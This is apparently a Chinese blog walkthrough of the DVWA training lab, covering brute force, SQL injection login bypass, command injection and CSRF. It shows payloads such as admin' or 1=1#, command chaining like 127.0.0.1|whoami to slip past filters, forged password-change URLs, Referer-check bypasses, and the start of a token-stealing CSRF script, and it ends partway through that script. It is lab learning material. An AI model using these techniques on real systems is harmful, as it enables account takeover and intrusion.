<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="generator" content="Hexo 7.3.0"><meta name="theme" content="hexo-theme-yun"><title>DVWA | Hexo</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"example.com","root":"/","title":"踏着梦走过时光","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}.","hits":"${hits} results found","hits_time":"${hits} results found in ${time} ms"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="Brute Force(暴力)low虽然题目叫暴力破解，但是这里还可以用sql注入。 sql注入我们用万能密码admin‘ or 1&#x3D;1#尝试，发现并不能登录成功，而使用admin‘ and 1&#x3D;1#却可以登录成功。查看源码发现if( $result &amp;&amp; mysqli_num_rows( $result ) &#x3D;&#x3D; 1 ) &#123; 返回的结果只能是一条而使">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA">
<meta property="og:url" content="http://example.com/2025/02/24/DVWA/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Brute Force(暴力)low虽然题目叫暴力破解，但是这里还可以用sql注入。 sql注入我们用万能密码admin‘ or 1&#x3D;1#尝试，发现并不能登录成功，而使用admin‘ and 1&#x3D;1#却可以登录成功。查看源码发现if( $result &amp;&amp; mysqli_num_rows( $result ) &#x3D;&#x3D; 1 ) &#123; 返回的结果只能是一条而使">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/1740495704682.jpg">
<meta property="og:image" content="http://example.com/images/1740562679448.jpg">
<meta property="og:image" content="http://example.com/images/1740562802371.jpg">
<meta property="og:image" content="http://example.com/images/1740562892199.jpg">
<meta property="og:image" content="http://example.com/2025/02/24/images/1740562965447.jpg">
<meta property="og:image" content="http://example.com/images/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20250226200124.png">
<meta property="og:image" content="http://example.com/images/4ac86263c3d9cf6806d06c2129d42058.jpeg">
<meta property="article:published_time" content="2025-02-24T12:30:41.000Z">
<meta property="article:modified_time" content="2025-04-04T02:38:22.314Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="DVWA">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/1740495704682.jpg"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="Table of Contents"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="Overview"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="John Doe"><img width="96" loading="lazy" src="/images/20220918203822_79b0d.png" alt="John Doe"></a><div class="site-author-name"><a href="/about/">John Doe</a></div><span class="site-name">Hexo</span><sub class="site-subtitle"></sub><div class="site-description"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="Home"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="Archives"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">38</span></a></div><div class="site-state-item"><a href="/categories/" title="Categories"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">0</span></a></div><div class="site-state-item"><a href="/tags/" title="Tags"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">16</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Brute-Force-%E6%9A%B4%E5%8A%9B"><span class="toc-number">1.</span> <span class="toc-text">Brute Force(暴力)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#low"><span class="toc-number">1.1.</span> <span class="toc-text">low</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.1.</span> <span class="toc-text">sql注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.1.2.</span> <span class="toc-text">暴力破解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium"><span class="toc-number">1.2.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high"><span class="toc-number">1.3.</span> <span class="toc-text">high</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Command-Injection-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">2.</span> <span class="toc-text">Command Injection(命令执行)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#window%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%BD%E4%BB%A4%E6%8B%BC%E6%8E%A5%E7%AC%A6"><span class="toc-number">2.1.</span> <span class="toc-text">window常见的命令拼接符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%BD%E4%BB%A4%E6%8B%BC%E6%8E%A5%E7%AC%A6"><span class="toc-number">2.2.</span> <span class="toc-text">Linux常见的命令拼接符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">2.3.</span> <span class="toc-text">常见的命令执行函数：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1%EF%BC%89system"><span class="toc-number">2.3.0.1.</span> <span class="toc-text">1）system</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%EF%BC%882%EF%BC%89exec"><span class="toc-number">2.3.0.2.</span> <span class="toc-text">（2）exec</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%EF%BC%883%EF%BC%89passthru"><span class="toc-number">2.3.0.3.</span> <span class="toc-text">（3）passthru</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%EF%BC%884%EF%BC%89shell-exec"><span class="toc-number">2.3.0.4.</span> <span class="toc-text">（4）shell_exec</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#low-1"><span class="toc-number">2.4.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium-1"><span class="toc-number">2.5.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high-1"><span class="toc-number">2.6.</span> <span class="toc-text">high</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CSRF%EF%BC%88%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">CSRF（跨站请求伪造）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#low-2"><span class="toc-number">3.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium-2"><span class="toc-number">3.2.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high-2"><span class="toc-number">3.3.</span> <span class="toc-text">high</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#application-json"><span class="toc-number">3.3.1.</span> <span class="toc-text">application&#x2F;json</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-number">3.3.2.</span> <span class="toc-text">方法一</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%88%E4%B8%8EXSS%E7%BB%93%E5%90%88%EF%BC%89"><span class="toc-number">3.3.3.</span> <span class="toc-text">方法二（与XSS结合）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%89%EF%BC%88bp%E8%87%AA%E5%8A%A8%E8%AF%86%E5%88%ABtoken%EF%BC%89"><span class="toc-number">3.3.4.</span> <span class="toc-text">方法三（bp自动识别token）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#File-Inclusion%EF%BC%88%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%89"><span class="toc-number">4.</span> <span class="toc-text">File Inclusion（文件包含）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">4.1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#low-3"><span class="toc-number">4.2.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium-3"><span class="toc-number">4.3.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high-3"><span class="toc-number">4.4.</span> <span class="toc-text">high</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#file-upload"><span class="toc-number">5.</span> <span class="toc-text">file upload</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#low-4"><span class="toc-number">5.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium-4"><span class="toc-number">5.2.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high-4"><span class="toc-number">5.3.</span> <span class="toc-text">high</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sql%E6%B3%A8%E5%85%A5-1"><span class="toc-number">6.</span> <span class="toc-text">sql注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#low-5"><span class="toc-number">6.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium-5"><span class="toc-number">6.2.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high-5"><span class="toc-number">6.3.</span> <span class="toc-text">high</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sql%E7%9B%B2%E6%B3%A8"><span class="toc-number">7.</span> <span class="toc-text">sql盲注</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Weak-Session-IDs"><span class="toc-number">8.</span> <span class="toc-text">Weak Session IDs</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#low-6"><span class="toc-number">8.1.</span> <span class="toc-text">low</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#medium-6"><span class="toc-number">8.2.</span> <span class="toc-text">medium</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#high-6"><span class="toc-number">8.3.</span> <span class="toc-text">high</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="http://example.com/2025/02/24/DVWA/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="John Doe"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Hexo"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">DVWA</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="Created: 2025-02-24 20:30:41" itemprop="dateCreated datePublished" datetime="2025-02-24T20:30:41+08:00">2025-02-24</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="Modified: 2025-04-04 10:38:22" itemprop="dateModified" datetime="2025-04-04T10:38:22+08:00">2025-04-04</time></div><div class="post-classify"><span class="post-tag"><a class="tag-item" href="/tags/DVWA/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">DVWA</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h1 id="Brute-Force-暴力"><a href="#Brute-Force-暴力" class="headerlink" title="Brute Force(暴力)"></a>Brute Force(暴力)</h1><h2 id="low"><a href="#low" class="headerlink" title="low"></a>low</h2><p>虽然题目叫暴力破解，但是这里还可以用sql注入。</p>
<h3 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h3><p>我们用万能密码admin‘ or 1&#x3D;1#尝试，发现并不能登录成功，而使用admin‘ and 1&#x3D;1#却可以登录成功。查看源码发现<code>if( $result &amp;&amp; mysqli_num_rows( $result ) == 1 ) &#123;</code></p>
<p>返回的结果只能是一条而使用or返回的是所有结果，一开始我还不懂为什么，查询资料才发现我对sql的查询逻辑有误解。</p>
<p>sql有这样的特性<strong>逐行扫描</strong>：数据库会检查每一行是否满足 <code>WHERE</code> 条件，无论是否已找到有效数据。<code>OR 1=1</code> 会导致所有行满足条件，因此全部返回。也就是说是根据结果是否符合or中的两个条件再返回而不是先检查or的条件再执行查询。</p>
<h3 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h3><p>关于bp中intruder四种爆破模式的区别可参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_39101049/article/details/90234669">Burp Suite中intruder爆破模块四种模式的区别_bp两个payload-CSDN博客</a></p>
<p>使用可参照<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/648596530">【实验报告】使用Burp Suite爆破网站登录账号，密码 - 知乎</a></p>
<p><img src="/../images/1740495704682.jpg" alt="1740495704682" loading="lazy"></p>
<p>成功。</p>
<h2 id="medium"><a href="#medium" class="headerlink" title="medium"></a>medium</h2><p> 查看源码我们发现这关除了给user和password加上了过滤还在输入错误时sleep2秒以降低爆破的速度。</p>
<p>同样用bp爆破，只不过时间会慢一点。</p>
<h2 id="high"><a href="#high" class="headerlink" title="high"></a>high</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">checkToken</span>( <span class="variable">$_REQUEST</span>[ <span class="string">&#x27;user_token&#x27;</span>], <span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span>], <span class="string">&#x27;index.php&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>查看源码发现这关加了个token的验证。</p>
<p>我们来看一下token的原理和作用机制。</p>
<p>什么是Token？</p>
<p>当用户登录成功，服务器会生成一个唯一的token，这个token通常会包含以下信息：</p>
<ul>
<li>用户标识（例如用户ID）</li>
<li>token生成的时间戳</li>
<li>token的有效期</li>
<li>加密签名（用于验证token的完整性和真实性）</li>
</ul>
<p>服务器将生成的token发送给客户端，客户端保存token并在每次发送请求时携带这个token与服务器那储存的token进行验证，退出时token消失。这里的token在每次请求还会刷新。</p>
<p>首先添加payload</p>
<p><img src="/../images/1740562679448.jpg" alt="1740562679448" loading="lazy"></p>
<p>payload1(密码)使用字典，payload2（token）类型使用递归提取，在设置里提取响应包的内容</p>
<p><img src="/../images/1740562802371.jpg" alt="1740562802371" loading="lazy"></p>
<p><img src="/../images/1740562892199.jpg" alt="1740562892199" loading="lazy"></p>
<p>这里选择我们刚刚提取的token并且首次请求的token是我们刚刚再次发送请求包中的token不是我们抓包时的token。成功爆破接下来就是等待。</p>
<img src="../images/1740562965447.jpg" alt="1740562965447" loading="lazy">

<h1 id="Command-Injection-命令执行"><a href="#Command-Injection-命令执行" class="headerlink" title="Command Injection(命令执行)"></a>Command Injection(命令执行)</h1><p>第一次见这种漏洞，先了解一下基本情况。</p>
<p><strong>漏洞描述</strong><br>命令执行漏洞是指服务器没有对执行的命令进行过滤，用户可以随意执行系统命令，命令执行漏洞属于高危漏洞之一<br>如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致，可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等，当攻击者可以控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常命令中，从而造成命令执行攻击<br>PHP执行命令是继承WebServer用户的权限，这个用户一般都有权限向Web目录写文件，可见该漏洞的危害性相当大。</p>
<p><strong>命令执行与代码执行的区别</strong></p>
<p>代码执行：执行效果完全依赖于语言本身</p>
<p>命令执行：执行效果不受语言本身、命令本身的限制</p>
<h2 id="window常见的命令拼接符"><a href="#window常见的命令拼接符" class="headerlink" title="window常见的命令拼接符"></a>window常见的命令拼接符</h2><p><code>|</code>直接执行后面的语句</p>
<p><code>||</code>如果前面命令是错的那么就执行后面的语句，否则只执行前面的语句</p>
<p><code>&amp;</code>前面和后面命令都要执行，无论前面真假</p>
<p><code>&amp;&amp;</code>如果前面为假，后面的命令也不执行，如果前面为真则执行两条命令</p>
<h2 id="Linux常见的命令拼接符"><a href="#Linux常见的命令拼接符" class="headerlink" title="Linux常见的命令拼接符"></a>Linux常见的命令拼接符</h2><p>除了<code>|、||、&amp;、&amp;&amp;</code>还多了一个<code>;</code>，作用和<code>&amp;</code>一样.</p>
<h2 id="常见的命令执行函数："><a href="#常见的命令执行函数：" class="headerlink" title="常见的命令执行函数："></a>常见的命令执行函数：</h2><h4 id="1）system"><a href="#1）system" class="headerlink" title="1）system"></a><strong>1）system</strong></h4><p>该函数会把执行结果输出 并把输出结果的最后一行作为字符串返回 如果执行失败则返回false 这个也最为常用</p>
<h4 id="（2）exec"><a href="#（2）exec" class="headerlink" title="（2）exec"></a><strong>（2）exec</strong></h4><p>不输出结果,返回执行结果的最后一行 可以使用output进行输出</p>
<h4 id="（3）passthru"><a href="#（3）passthru" class="headerlink" title="（3）passthru"></a><strong>（3）passthru</strong></h4><p>此函数只调用命令 并把运行结果原样地直接输出 没有返回值。</p>
<h4 id="（4）shell-exec"><a href="#（4）shell-exec" class="headerlink" title="（4）shell_exec"></a><strong>（4）shell_exec</strong></h4><p>不输出结果，返回执行结果 使用反引号(&#96;&#96;)时调用的就是此函数</p>
<h2 id="low-1"><a href="#low-1" class="headerlink" title="low"></a>low</h2><p>查看源码发现并没有任何过滤代码，我们直接用<code>127.0.0.1&amp;whoami</code>,whoami会显示当前用户的用户名和SID（Windows操作系统中用于唯一标识用户、组和计算机账户的一个唯一标识符）。</p>
<p><img src="/../images/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20250226200124.png" alt="微信图片_20250226200124" loading="lazy"></p>
<p>成功。</p>
<h2 id="medium-1"><a href="#medium-1" class="headerlink" title="medium"></a>medium</h2><p>查看源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(     <span class="string">&#x27;&amp;&amp;&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;;&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,   ); </span><br></pre></td></tr></table></figure>

<p>发现把<code>&amp;&amp;</code>和<code>；</code>过滤了，那么我们可以利用没有被过滤的命令拼接符，如<code>127.0.0.1&amp;whoami</code>.</p>
<h2 id="high-1"><a href="#high-1" class="headerlink" title="high"></a>high</h2><p>查看源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$substitutions</span> = <span class="keyword">array</span>(     <span class="string">&#x27;||&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;&amp;&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;;&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;| &#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;-&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;$&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;(&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;)&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,     <span class="string">&#x27;`&#x27;</span> =&gt; <span class="string">&#x27;&#x27;</span>,   ); </span><br></pre></td></tr></table></figure>

<p>发现把能过滤的都过滤了，不过仔细看发现<code>|</code>其实是<code>| </code>,多了个括号，那么这个过滤是没用的。我们直接用127.0.0.1|whoami测试成功。</p>
<h1 id="CSRF（跨站请求伪造）"><a href="#CSRF（跨站请求伪造）" class="headerlink" title="CSRF（跨站请求伪造）"></a>CSRF（跨站请求伪造）</h1><p><strong>第一次见，看原理：</strong></p>
<p>简单的说，是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作（如发邮件，发消息，甚至财产操作（如转账和购买商品））。因为浏览器之前认证过，所以被访问的站点会觉得这是真正的用户操作而去运行。</p>
<p><img src="/../images/4ac86263c3d9cf6806d06c2129d42058.jpeg" alt="4ac86263c3d9cf6806d06c2129d42058" loading="lazy"></p>
<p>从上图能够看出，要完毕一次CSRF攻击，受害者必须依次完毕两个步骤：</p>
<p>​       <code> 登录受信任站点A，并在本地生成Cookie。</code></p>
<p>​       <code> 在不登出A的情况下，访问危险站点B。</code>(要在同一个浏览器中进行)</p>
<p>攻击者只有预测出URL的所有参数与参数值，才能成功地构造一个伪造的请求;反之，攻击者将无法攻击成功。</p>
<h2 id="low-2"><a href="#low-2" class="headerlink" title="low"></a>low</h2><p>我们修改密码后发现发送的是GET请求，URL如下：</p>
<p><code>http://dvwa:8898/vulnerabilities/csrf/?password_new=password&amp;password_conf=password&amp;Change=Change#</code></p>
<p>由此我们也可以伪造一个url</p>
<p><code>http://dvwa:8898/vulnerabilities/csrf/?password_new=123&amp;password_conf=123&amp;Change=Change#</code></p>
<p>这样在登录状态下用同一个浏览器打开便会修改密码。</p>
<p>但是这样的url太明显了，我们可以利用站长工具生成一个短域名，用这个短域名进入的也是同一个页面。</p>
<p>我们也可以在html中用支持src的标签将url隐藏起来。</p>
<h2 id="medium-2"><a href="#medium-2" class="headerlink" title="medium"></a>medium</h2><p>这关主要改变的代码是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">stripos</span>( <span class="variable">$_SERVER</span>[ <span class="string">&#x27;HTTP_REFERER&#x27;</span> ] ,<span class="variable">$_SERVER</span>[ <span class="string">&#x27;SERVER_NAME&#x27;</span> ]) !== <span class="literal">false</span> </span><br></pre></td></tr></table></figure>

<p>代码检查了保留变量 <strong>HTTP_REFERER</strong>（http包头的Referer参数的值，表示来源地址）中是否包含<strong>SERVER_NAME</strong>（http包头的Host参数，及要访问的主机名）</p>
<p>这个检查的作用是验证用户是否是从同一个网站上的另一个页面跳转过来的，防止外部链接直接访问某些页面，增加网站安全性。</p>
<p>我们可以抓包修改请求头referer</p>
<p>我们也可以绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">目录混淆法：将HTML页面放在127.0.0.1目录下，构建payload</span><br><span class="line">http://www.xxx.com/127.0.0.1/csrf.html</span><br><span class="line"></span><br><span class="line">文件名混淆法：将HTML文件重命名为127.0.0.1，构建payload</span><br><span class="line">http://www.xxx.com/127.0.0.1.html</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="high-2"><a href="#high-2" class="headerlink" title="high"></a>high</h2><h3 id="application-json"><a href="#application-json" class="headerlink" title="application&#x2F;json"></a>application&#x2F;json</h3><p>查看源码发现</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$data</span> = <span class="title function_ invoke__">json_decode</span>(<span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;php://input&#x27;</span>), <span class="literal">true</span>); </span><br></pre></td></tr></table></figure>

<p>这是针对<strong>application&#x2F;json</strong>类型的数据</p>
<ol>
<li><p><strong>数据格式</strong>：</p>
<ul>
<li>数据以JSON（JavaScript Object Notation）格式表示。</li>
<li>JSON格式可以表示更复杂的数据结构，如数组、对象、嵌套对象等。</li>
<li>字符串需要用双引号包裹。</li>
</ul>
<p>示例：<code>&#123;&quot;name&quot;: &quot;John Doe&quot;, &quot;age&quot;: 30, &quot;city&quot;: &quot;New York&quot;&#125;</code></p>
</li>
<li><p><strong>用途</strong>：</p>
<ul>
<li>适用于现代Web应用程序，特别是那些使用Ajax技术进行数据交换的应用程序。</li>
<li>适合传输复杂或结构化数据。</li>
</ul>
</li>
</ol>
<p>虽然有这个解析代码但我们这的请求中不是这类数据。</p>
<p>源码中新增了 <code>checkToken( $token, $_SESSION[ &#39;session_token&#39; ], &#39;index.php&#39; ); </code>来检查token。</p>
<p>那么我们就需要获取用户的token。</p>
<h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><p>由于现在的浏览器是不允许跨域请求，即攻击者的服务器192.168.67.140不能向被攻击的服务器192.168.67.143发送请求，除非是被攻击服务器主动发给攻击者服务器。那么我们只能将我们的攻击页面放在被攻击者的服务器引诱受害者访问，攻击页面代码如下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=&quot;text/javascript&quot;&gt; </span><br><span class="line">    function attack() &#123;</span><br><span class="line"> </span><br><span class="line">   document.getElementsByName(&#x27;user_token&#x27;)[0].value=document.getElementById(&quot;hack&quot;).contentWindow.document.getElementsByName(&#x27;user_token&#x27;)[0].value;</span><br><span class="line">   